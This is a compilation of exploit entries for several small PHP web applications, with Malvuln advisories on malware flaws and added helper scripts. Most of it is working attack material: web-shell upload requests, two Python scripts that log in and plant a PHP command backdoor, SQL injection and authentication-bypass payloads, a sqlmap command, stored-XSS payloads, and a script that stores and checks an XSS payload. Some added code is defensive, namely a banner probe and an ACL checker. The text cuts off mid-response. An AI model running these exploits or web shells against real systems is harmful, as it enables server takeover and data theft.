<pre><code># Exploit Title: Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 2022-02-08<br /># Exploit Author: Juli Agarwal(@agarwaljuli)<br /># Vendor Homepage: https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code<br /># Version: 1.0<br /># Tested on: XAMPP, Kali Linux<br /><br />Description - The admin panel's user profile page saves the uploaded profile picture (the "img" field of classes/Users.php?f=save) without checking the file's extension or type, and stores it under /erms/uploads/ with a Unix-timestamp prefix, where the web server will execute it. An authenticated attacker can therefore upload a PHP web shell and achieve remote code execution as the web server user.<br /><br />POC:-<br /><br />==========<br /># Request:<br />==========<br /><br />POST /erms/classes/Users.php?f=save HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------37791356766765055891341961306<br />Content-Length: 1004<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/erms/admin/?page=user<br />Cookie: PHPSESSID=22f0bd65ef694041af3177057e7fbd5a<br /><br />-----------------------------37791356766765055891341961306<br />Content-Disposition: form-data; name="id"<br /><br />1<br />-----------------------------37791356766765055891341961306<br />Content-Disposition: form-data; name="firstname"<br /><br />Adminstrator<br />-----------------------------37791356766765055891341961306<br />Content-Disposition: form-data; name="lastname"<br /><br />Admin<br />-----------------------------37791356766765055891341961306<br />Content-Disposition: form-data; name="username"<br /><br />admin<br />-----------------------------37791356766765055891341961306<br />Content-Disposition: form-data; name="password"<br /><br /><br />-----------------------------37791356766765055891341961306<br />Content-Disposition: form-data; name="img"; filename="shell.php"<br />Content-Type: application/x-php<br /><br /><html><br /><body><br /><b>Remote code execution: </b><br><pre><br /><?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?><br /></pre><br /></body><br /></html><br /><br />-----------------------------37791356766765055891341961306--<br /><br />================<br /># Webshell access:<br />================<br /><br />The file is stored as /erms/uploads/{unix timestamp}_{original name}; the prefix below (1644334740) is 2022-02-08 15:39:00 UTC, i.e. the server clock at upload time truncated to the minute, so the path is predictable rather than random.<br /><br />POC: http://localhost/erms/uploads/1644334740_shell.php?cmd=id<br /><br /># Webshell response:<br />Remote code execution:<br />uid=1(daemon) gid=1(daemon) groups=1(daemon)<br /></code></pre>
<pre><code># Exploit Title: Chikitsa Patient Management System 2.0.2 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 03/12/2021<br /># Exploit Author: 0z09e (https://twitter.com/0z09e)<br /># Vendor Homepage: https://sourceforge.net/u/dharashah/profile/<br /># Software Link: https://sourceforge.net/projects/chikitsa/files/Chikitsa%202.0.2.zip/download<br /># Version: 2.0.2<br /># Tested on: Ubuntu<br /><br />import requests<br />import os<br />import argparse<br /><br />tmp_dir = None  # working directory holding the generated plugin archive<br /><br /><br />def login(session, target, username, password):<br />    print("[+] Attempting to login with the credential")<br />    url = target + "/index.php/login/valid_signin"<br />    login_data = {"username": username, "password": password}<br />    session.post(url, data=login_data, verify=False)<br />    return session<br /><br /><br />def generate_plugin():<br />    # A "plugin" is a zip archive; the PHP file inside ends up under<br />    # application/modules/ unchanged, so a one-line shell is enough.<br />    print("[+] Generating a malicious plugin")<br />    global tmp_dir<br />    tmp_dir = os.popen("mktemp -d").read().rstrip()<br />    open(f"{tmp_dir}/rce.php", "w").write("<?php system($_REQUEST['cmd']);?>")<br />    os.popen(f"cd {tmp_dir} && zip rce.zip rce.php").read()<br /><br /><br />def upload_plugin(session, target):<br />    # Upload the archive, then activate the module named after it ("rce").<br />    print("[+] Uploading the plugin into the server.")<br />    url = target + "/index.php/module/upload_module/"<br />    file = open(f"{tmp_dir}/rce.zip", "rb").read()<br />    session.post(url, verify=False, files={"extension": ("rce.zip", file)})<br />    session.get(target + "/index.php/module/activate_module/rce", verify=False)<br />    print(f"[+] Backdoor Deployed at : {target}/application/modules/rce.php")<br />    print(f"[+] Example Output : {requests.get(target + '/application/modules/rce.php?cmd=id', verify=False).text}")<br /><br /><br />def main():<br />    parser = argparse.ArgumentParser("""<br /> __ _ __ _ __ <br /> _____/ /_ (_) /__(_) /__________ _<br /> / ___/ __ \/ / //_/ / __/ ___/ __ `/<br />/ /__/ / / / / ,< / / /_(__ ) /_/ / <br />\___/_/ /_/_/_/|_/_/\__/____/\__,_/ <br /> <br />Chikitsa Patient Management System 2.0.2 Authenticated Plugin Upload Remote Code Execution : <br />POC Written By - 0z09e (https://twitter.com/0z09e)\n\n""", formatter_class=argparse.RawTextHelpFormatter)<br />    req_args = parser.add_argument_group('required arguments')<br />    req_args.add_argument("URL", help="Target URL. Example : http://10.20.30.40/path/to/chikitsa")<br />    req_args.add_argument("-u", "--username", help="Username", required=True)<br />    req_args.add_argument("-p", "--password", help="password", required=True)<br />    args = parser.parse_args()<br /><br />    target = args.URL<br />    if target[-1] == "/":<br />        target = target[:-1]<br />    username = args.username<br />    password = args.password<br /><br />    session = requests.session()<br />    login(session, target, username, password)<br />    generate_plugin()<br />    upload_plugin(session, target)<br /><br /><br />if __name__ == "__main__":<br />    main()<br /></code></pre>
<pre><code># Exploit Title: Exam Reviewer Management System 1.0 - 'id' SQL Injection<br /># Date: 2022-02-18<br /># Exploit Author: Juli Agarwal(@agarwaljuli)<br /># Vendor Homepage: https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code<br /># Version: 1.0<br /># Tested on: Windows 10/Kali Linux<br /><br />Description - The 'id' GET parameter of the take_exam page is placed unsanitised inside a single-quoted string in a MySQL query, so it is injectable. sqlmap confirmed boolean-based blind, error-based and time-based blind injection (output below).<br /><br />Vulnerable URL - http://127.0.0.1/erms/?p=take_exam&id=1<br /><br />POC:-<br /><br />---<br />Parameter: id (GET)<br />    Type: boolean-based blind<br />    Title: AND boolean-based blind - WHERE or HAVING clause<br />    Payload: p=take_exam&id=1' AND 4755=4755 AND 'VHNu'='VHNu<br /><br />    Type: error-based<br />    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br />    Payload: p=take_exam&id=1' OR (SELECT 8795 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(8795=8795,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MCXA'='MCXA<br /><br />    Type: time-based blind<br />    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br />    Payload: p=take_exam&id=1' AND (SELECT 2206 FROM (SELECT(SLEEP(5)))AhEo) AND 'vqGg'='vqGg<br />---<br /><br />SQLMAP COMMAND<br /><br /># sqlmap -u "http://127.0.0.1/erms/?p=take_exam&id=1" -p id --dbs --level 3<br /></code></pre>
<pre><code># Exploit Title: Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated)<br /># Date: 03/12/2021<br /># Exploit Author: 0z09e (https://twitter.com/0z09e)<br /># Vendor Homepage: https://sourceforge.net/u/dharashah/profile/<br /># Software Link: https://sourceforge.net/projects/chikitsa/files/Chikitsa%202.0.2.zip/download<br /># Version: 2.0.2<br /># Tested on: Ubuntu<br /><br />import requests<br />import os<br />from zipfile import ZipFile<br />import argparse<br /><br />tmp_dir = None  # working directory holding the downloaded and modified backup<br /><br /><br />def login(session, target, username, password):<br />    print("[+] Attempting to login with the credential")<br />    url = target + "/index.php/login/valid_signin"<br />    login_data = {"username": username, "password": password}<br />    session.post(url, data=login_data, verify=False)<br />    return session<br /><br /><br />def download_backup(session, target):<br />    # The backup endpoint returns a zip holding the database dump, prefix.txt<br />    # and the uploads tree.<br />    print("[+] Downloading the backup (This may take some time)")<br />    url = target + "/index.php/settings/take_backup/"<br />    backup_req = session.get(url, verify=False)<br />    global tmp_dir<br />    tmp_dir = os.popen("mktemp -d").read().rstrip()<br />    open(tmp_dir + "/backup_raw.zip", "wb").write(backup_req.content)<br />    print(f"[+] Backup downloaded at {tmp_dir}/backup_raw.zip")<br /><br /><br />def modify_backup():<br />    # Drop a PHP shell into the uploads tree and re-pack the archive with the<br />    # same top-level entries.<br />    print("[+] Modifying the backup by injecting a backdoor.")<br />    zf = ZipFile(f'{tmp_dir}/backup_raw.zip', 'r')<br />    zf.extractall(tmp_dir)<br />    zf.close()<br />    open(tmp_dir + "/uploads/media/rce.php", "w").write("<?php system($_REQUEST['cmd']);?>")<br />    os.popen(f"cd {tmp_dir}/ && zip -r backup_modified.zip chikitsa-backup.sql prefix.txt uploads/").read()<br /><br /><br />def upload_backup(session, target):<br />    # Restoring the backup unpacks the archive, shell included, under the web root.<br />    print("[+] Uploading the backup back into the server.(This may take some time)")<br />    url = target + "/index.php/settings/restore_backup"<br />    file = open(f"{tmp_dir}/backup_modified.zip", "rb").read()<br />    session.post(url, verify=False, files={"backup": ("backup-modified.zip", file)})<br />    print(f"[+] Backdoor Deployed at : {target}/uploads/restore_backup/uploads/media/rce.php")<br />    print(f"[+] Example Output : {requests.get(target + '/uploads/restore_backup/uploads/media/rce.php?cmd=id', verify=False).text}")<br /><br /><br />def main():<br />    parser = argparse.ArgumentParser("""<br /> __ _ __ _ __ <br /> _____/ /_ (_) /__(_) /__________ _<br /> / ___/ __ \/ / //_/ / __/ ___/ __ `/<br />/ /__/ / / / / ,< / / /_(__ ) /_/ / <br />\___/_/ /_/_/_/|_/_/\__/____/\__,_/ <br /> <br />Chikitsa Patient Management System 2.0.2 Authenticated Remote Code Execution : <br />POC Written By - 0z09e (https://twitter.com/0z09e)\n\n""", formatter_class=argparse.RawTextHelpFormatter)<br />    req_args = parser.add_argument_group('required arguments')<br />    req_args.add_argument("URL", help="Target URL. Example : http://10.20.30.40/path/to/chikitsa")<br />    req_args.add_argument("-u", "--username", help="Username", required=True)<br />    req_args.add_argument("-p", "--password", help="password", required=True)<br />    args = parser.parse_args()<br /><br />    target = args.URL<br />    if target[-1] == "/":<br />        target = target[:-1]<br />    username = args.username<br />    password = args.password<br /><br />    session = requests.session()<br />    login(session, target, username, password)<br />    download_backup(session, target)<br />    modify_backup()<br />    upload_backup(session, target)<br /><br /><br />if __name__ == "__main__":<br />    main()<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/3d4350282ae043177063de2ad4827b97.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.XRat.k<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: XRat malware listens on TCP port 20888 and presents its command console to anyone who connects, with no authentication. Third-party attackers who can reach the port can run commands on, and so hijack, the infected host.<br />Type: PE32<br />MD5: 3d4350282ae043177063de2ad4827b97<br />Vuln ID: MVID-2022-0482<br />Dropped files: Rat.exe<br />Disclosure: 02/08/2022<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 20888<br />"X-Rat System Console" v2.8<br /><br />Status Ready, Client: 192.168.18.130:8325<br /><br />[DESKTOP-2C3IQHO@C:\WINDOWS\system32]#exec calc<br /><br />Command "EXEC" succeed.<br /><br />[DESKTOP-2C3IQHO@C:\WINDOWS\system32]#<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
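Added example, not part of the Malvuln advisory: a banner probe that identifies hosts exposing the XRat console on TCP/20888, for sweeping a network segment after an infection. The banner text it matches is the one captured in the session above; the socket handling, the read cut-off at the `#` prompt and the constructed sample bytes are this example's own.

```python
"""Added example (not Malvuln's code): detect an exposed XRat console by its banner."""
import re
import socket

XRAT_PORT = 20888
_BANNER_RE = re.compile(rb'"X-Rat System Console" v(?P<version>[\d.]+)')
_CLIENT_RE = re.compile(rb"Client:\s*(?P<client>\d{1,3}(?:\.\d{1,3}){3}:\d+)")


def parse_banner(data):
    """Return {'version': ..., 'client': ...} for an XRat console banner, else None."""
    m = _BANNER_RE.search(data)
    if not m:
        return None
    c = _CLIENT_RE.search(data)
    return {"version": m.group("version").decode(),
            "client": c.group("client").decode() if c else None}


def probe(host, port=XRAT_PORT, timeout=3.0):
    """Connect, read what the service volunteers, and classify it.
    Returns the parsed banner, or None on connection failure / unknown service."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            data = b""
            try:
                # The console prints its banner and then a prompt ending in '#'.
                while len(data) < 512 and b"#" not in data:
                    chunk = s.recv(256)
                    if not chunk:
                        break
                    data += chunk
            except socket.timeout:
                pass
    except OSError:
        return None
    return parse_banner(data)


# Constructed sample: the bytes of the session shown in the advisory.
SAMPLE_BANNER = (b'"X-Rat System Console" v2.8\r\n\r\n'
                 b"Status Ready, Client: 192.168.18.130:8325\r\n\r\n"
                 b"[DESKTOP-2C3IQHO@C:\\WINDOWS\\system32]#")

if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1]) if len(sys.argv) > 1 else parse_banner(SAMPLE_BANNER))
```

The `Client:` field in the banner is worth recording: it is the address the RAT believes its operator connects from, which is useful pivot data for the incident.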
<pre><code># Exploit Title: Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass<br /># Exploit Author: able403<br /># Date: 08/12/2021<br /># Vendor Homepage: https://www.sourcecodester.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip<br /># Version: 1.0<br /># Tested on: Windows 10<br /># Vulnerable page: Actions.php<br /># Vulnerable parameters: "username" (submitted as the "email" field of the employee_login request below)<br /><br />Technical description:<br /><br />An SQL injection vulnerability exists in the Employees Daily Task Management System login form (handled by Actions.php?a=employee_login): the submitted username is concatenated into the login query, so an attacker can comment out the password check and bypass authentication.<br /><br />Steps to exploit:<br /><br />1) Navigate to http://localhost/login.php<br /><br />2) Insert the payload in the username field<br /><br />3) Click login<br /><br />Proof of concept (PoC):<br /><br />The following payload bypasses the authentication mechanism of the Employees Daily Task Management System login form -<br /><br />123'+or+1=1+--+-<br /><br />---<br /><br />POST /Actions.php?a=employee_login HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 43<br />Origin: http://edtms.com<br />Connection: close<br />Referer: http://edtms.com/login.php<br />Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl<br /><br />email=admin'+or+1=1+--+-&password=123123213<br /><br />Response:<br /><br />HTTP/1.1 200 OK<br />Date: Wed, 10 Nov 2021 02:23:38 GMT<br />Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02<br />X-Powered-By: PHP/8.0.2<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 48<br /><br />{"status":"success","msg":"Login successfully."}<br /><br />---<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/16fab35b51f9e6447f2a8c04db4ebe93.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Frauder.jt<br />Vulnerability: Insecure Permissions<br />Description: The malware writes an extensionless PE file named "x" to the root of the C:\ drive with an insecure ACL that grants Change (C) permission to the Authenticated Users group. Any standard user can therefore rename the dropped executable to disable it, or replace it with their own executable and wait for a privileged user to log on to the infected machine to potentially escalate privileges.<br />Type: PE32<br />MD5: 16fab35b51f9e6447f2a8c04db4ebe93<br />Vuln ID: MVID-2022-0481<br />Dropped files: x<br />Disclosure: 02/08/2022<br /><br />Exploit/PoC:<br />C:\>cacls x<br />C:\x BUILTIN\Administrators:(ID)F<br />     NT AUTHORITY\SYSTEM:(ID)F<br />     BUILTIN\Users:(ID)R<br />     NT AUTHORITY\Authenticated Users:(ID)C<br /><br />C:\>dir x<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />02/09/2013  01:43 PM            25,088 x<br />               1 File(s)         25,088 bytes<br />               0 Dir(s)  27,505,713,152 bytes free<br /><br />C:\>type x<br />MZÉ  !This program cannot be run in DOS mode.<br /></code></pre>
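Added example, not part of the Malvuln advisory: a check that parses `cacls` output such as the listing above and flags access-control entries that let low-privileged principals modify a file, which is the condition the advisory describes. The sample listing is the advisory's; the set of low-privileged principals, the rights mapping (cacls codes: F full, C change, W write, R read, N none) and the `check_file` wrapper are this example's own assumptions.

```python
"""Added example (not Malvuln's code): flag write access for low-privileged
principals in `cacls` output."""
import re
import subprocess

LOW_PRIV = {"builtin\\users", "nt authority\\authenticated users", "everyone",
            "nt authority\\interactive"}
WRITE_RIGHTS = {"F", "C", "W"}          # any of these lets the principal replace the file
_ENTRY_RE = re.compile(
    r"^\s*(?P<principal>.+?):(?P<flags>(?:\([^)]*\))*)(?P<rights>[A-Z]+)\s*$")


def parse_cacls(output, path):
    """Yield (principal, rights) pairs from cacls output for `path`.
    cacls prints the path in front of the first ACE; later ACEs are indented."""
    for line in output.splitlines():
        if line.startswith(path):
            line = line[len(path):]
        m = _ENTRY_RE.match(line)
        if m:
            yield m.group("principal").strip(), m.group("rights")


def weak_entries(output, path):
    """Entries that grant write-capable rights to a low-privileged principal."""
    return [(p, r) for p, r in parse_cacls(output, path)
            if p.lower() in LOW_PRIV and r in WRITE_RIGHTS]


def check_file(path):
    """Run cacls on a Windows host and return the weak entries (not run offline)."""
    out = subprocess.run(["cacls", path], capture_output=True, text=True,
                         check=True).stdout
    return weak_entries(out, path)


# Constructed sample: the listing from the advisory above.
SAMPLE = """C:\\x BUILTIN\\Administrators:(ID)F
     NT AUTHORITY\\SYSTEM:(ID)F
     BUILTIN\\Users:(ID)R
     NT AUTHORITY\\Authenticated Users:(ID)C
"""

if __name__ == "__main__":
    print(weak_entries(SAMPLE, "C:\\x"))   # [('NT AUTHORITY\\Authenticated Users', 'C')]
```

Run `check_file(r"C:\x")` on the host itself; on a clean machine the same check over every file in the drive root is a cheap way to spot other world-modifiable executables.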
<pre><code># Exploit Title: Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS)<br /># Exploit Author: able403<br /># Date: 08/12/2021<br /># Vendor Homepage: https://www.sourcecodester.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip<br /># Version: 1.0<br /># Tested on: Windows 10<br /># Vulnerable page: ?page=view_task&id=2<br /><br />Technical description:<br /><br />Stored XSS exists in Employees Daily Task Management System: task and account fields are saved and later rendered without output encoding. An attacker can use this to run JavaScript in the browser of any user who views the affected page, which can lead to cookie theft, defacement and more.<br /><br />xss-1:<br /><br />1) Navigate to http://localhost/?page=view_task&id=2 and click "edit task"<br />2) Insert the payload in the "title" and "Task Description" fields<br />3) Click save<br /><br />Proof of concept (PoC):<br /><br />The following payload will run the JavaScript -<br /><br />"><img src=# onerror=alert(123)><br /><br />---<br />POST /Actions.php?a=save_task HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 312<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/?page=tasks<br />Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl<br /><br />id=2&title=Task+102%22%3E%3Cimg+src%3D%23+onerror%3Dalert(123)%3E&status=1&assign_to%5B%5D=2&description=%3Cp%3EThis+is+another+task+for+you.%3C%2Fp%3E%3Cp%3EThis+description+has+been+updated%3C%2Fp%3E%3Cp%3E%3Cbr%3E%3C%2Fp%3E%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3D%23+onerror%3Dalert(333)%26gt%3B%3Cbr%3E%3C%2Fp%3E<br /><br />xss-2:<br /><br />1) Navigate to http://localhost/?page=manage_account<br />2) Insert the payload in the "full name", "contact" or "email" field<br /><br />Proof of concept (PoC):<br /><br />The following payload will run the JavaScript -<br /><br />"><img src=# onerror=alert(123)><br /><br />---<br />POST /Actions.php?a=update_credentials_employee HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------27882107026209045483167935384<br />Content-Length: 1613<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/?page=manage_account<br />Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl<br /><br />-----------------------------27882107026209045483167935384<br />Content-Disposition: form-data; name="id"<br /><br />1<br />-----------------------------27882107026209045483167935384<br />Content-Disposition: form-data; name="fullname"<br /><br />John D Smith<br />-----------------------------27882107026209045483167935384<br />Content-Disposition: form-data; name="gender"<br /><br />Male<br />-----------------------------27882107026209045483167935384<br />Content-Disposition: form-data; name="dob"<br /><br />1997-06-23<br />-----------------------------27882107026209045483167935384<br />Content-Disposition: form-data; name="contact"<br /><br />098123456789"><img src=# onerror=alert(123)><br />-----------------------------27882107026209045483167935384<br />Content-Disposition: form-data; name="email"<br /><br />jsmith@sample.com<br />-----------------------------27882107026209045483167935384<br />Content-Disposition: form-data; name="address"<br /><br />Sample Address<br />-----------------------------27882107026209045483167935384<br />Content-Disposition: form-data; name="department_id"<br /><br />1<br />-----------------------------27882107026209045483167935384<br />Content-Disposition: form-data; name="email"<br /><br />jsmith@sample.com<br />-----------------------------27882107026209045483167935384<br />Content-Disposition: form-data; name="password"<br /><br /><br />-----------------------------27882107026209045483167935384<br />Content-Disposition: form-data; name="old_password"<br /><br /><br />-----------------------------27882107026209045483167935384<br />Content-Disposition: form-data; name="avatar"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------27882107026209045483167935384--<br /></code></pre>
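Added example, not part of the advisory above: a script that stores the xss-1 payload through `Actions.php?a=save_task` and then classifies how the view page echoes it. A plain substring check is not enough here: in the captured request the description value was already entity-encoded by the editor (`%26gt%3B` is `&gt;`), so the same text can come back harmless, and only an unchanged echo actually executes. URL, cookie and field names are from the request above; the response bodies used offline are constructed.

```python
"""Added example (not the advisory author's code): store the payload, then tell
a raw (executing) echo from an entity-encoded one."""
import html
import urllib.parse
import urllib.request

# One marker per field so the view page tells us which field is unsafe.
MARKERS = {"title": '"><img src=# onerror=alert(123)>',
           "description": '"><img src=# onerror=alert(333)>'}


def classify(body, marker):
    """'raw' if the marker appears unchanged in the HTML, 'escaped' if only an
    entity-encoded form of it is present, 'absent' otherwise."""
    if marker in body:
        return "raw"
    if (html.escape(marker, quote=True) in body       # " -> &quot;
            or html.escape(marker, quote=False) in body):  # " left as-is
        return "escaped"
    return "absent"


def save_task(base_url, cookie, task_id, title, description, assign_to="2"):
    """Store title/description with the same request shape the advisory shows."""
    data = urllib.parse.urlencode({"id": task_id, "title": title, "status": "1",
                                   "assign_to[]": assign_to,
                                   "description": description}).encode()
    req = urllib.request.Request(f"{base_url}/Actions.php?a=save_task",
                                 data=data, method="POST")
    req.add_header("Cookie", cookie)
    req.add_header("X-Requested-With", "XMLHttpRequest")
    with urllib.request.urlopen(req, timeout=10) as r:
        return r.read().decode(errors="replace")


def check_task(base_url, cookie, task_id):
    """Fetch ?page=view_task and classify the echo of each field's marker."""
    req = urllib.request.Request(f"{base_url}/?page=view_task&id={task_id}")
    req.add_header("Cookie", cookie)
    with urllib.request.urlopen(req, timeout=10) as r:
        body = r.read().decode(errors="replace")
    return {field: classify(body, m) for field, m in MARKERS.items()}


# Constructed sample pages (not captured output) covering the three outcomes.
RAW_PAGE = '<h3>Task 102"><img src=# onerror=alert(123)></h3>'
CAPTURED_STYLE_DESC = '<p>"&gt;&lt;img src=# onerror=alert(333)&gt;<br></p>'

if __name__ == "__main__":
    base, cookie = "http://localhost", "PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl"
    save_task(base, cookie, "2", "Task 102" + MARKERS["title"],
              "<p>task</p>" + MARKERS["description"])
    print(check_task(base, cookie, "2"))
```

A result of `{'title': 'raw', 'description': 'escaped'}` means only the title is exploitable; treat `raw` as confirmed, `escaped` as a sanitised field, and `absent` as a field that was truncated or not rendered on that page.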
<pre><code># Exploit Title: Home Owners Collection Management System 1.0 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 9/02/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Linux<br /><br /># The system-settings update handler (classes/SystemSettings.php?f=update_settings) saves the<br /># "cover" upload to /hocms/uploads/ with a Unix-timestamp prefix and no file-type check, so an<br /># authenticated user can drop a PHP web shell and execute commands as the web server user.<br /><br /># Request sent as an authenticated user<br /><br />POST /hocms/classes/SystemSettings.php?f=update_settings HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------31935477191495174627236953215<br />Content-Length: 769<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/hocms/admin/?page=system_info<br />Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju<br /><br />-----------------------------31935477191495174627236953215<br />Content-Disposition: form-data; name="name"<br /><br />Home Owners Collection Management System'<br />-----------------------------31935477191495174627236953215<br />Content-Disposition: form-data; name="short_name"<br /><br />HOCMS - PHP<br />-----------------------------31935477191495174627236953215<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------31935477191495174627236953215<br />Content-Disposition: form-data; name="cover"; filename="cmd.php"<br />Content-Type: application/x-php<br /><br /><?php<br />if($_REQUEST['s']) {<br />    system($_REQUEST['s']);<br />} else phpinfo();<br />?><br /></pre><br /></body><br /></html><br /><br />-----------------------------31935477191495174627236953215--<br /><br /><br /># Response<br /><br />HTTP/1.1 200 OK<br />Date: Wed, 09 Feb 2022 09:32:16 GMT<br />Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1<br />X-Powered-By: PHP/8.1.2<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Access-Control-Allow-Origin: *<br />Content-Length: 1<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />1<br /><br /><br /># ------------------------------------------------------------------------------------------<br /># Request to webshell (the 1644399120 prefix is 2022-02-09 09:32:00 UTC, the minute of the<br /># upload response's Date header, so the stored name is predictable)<br /># ------------------------------------------------------------------------------------------<br /><br />GET /hocms/uploads/1644399120_cmd.php?s=echo+0xSaudi HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju<br />Upgrade-Insecure-Requests: 1<br /><br /><br /># ------------------------------------------------------------------------------------------<br /># Webshell response<br /># ------------------------------------------------------------------------------------------<br /><br />HTTP/1.1 200 OK<br />Date: Wed, 09 Feb 2022 09:39:06 GMT<br />Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1<br />X-Powered-By: PHP/8.1.2<br />Access-Control-Allow-Origin: *<br />Content-Length: 33<br 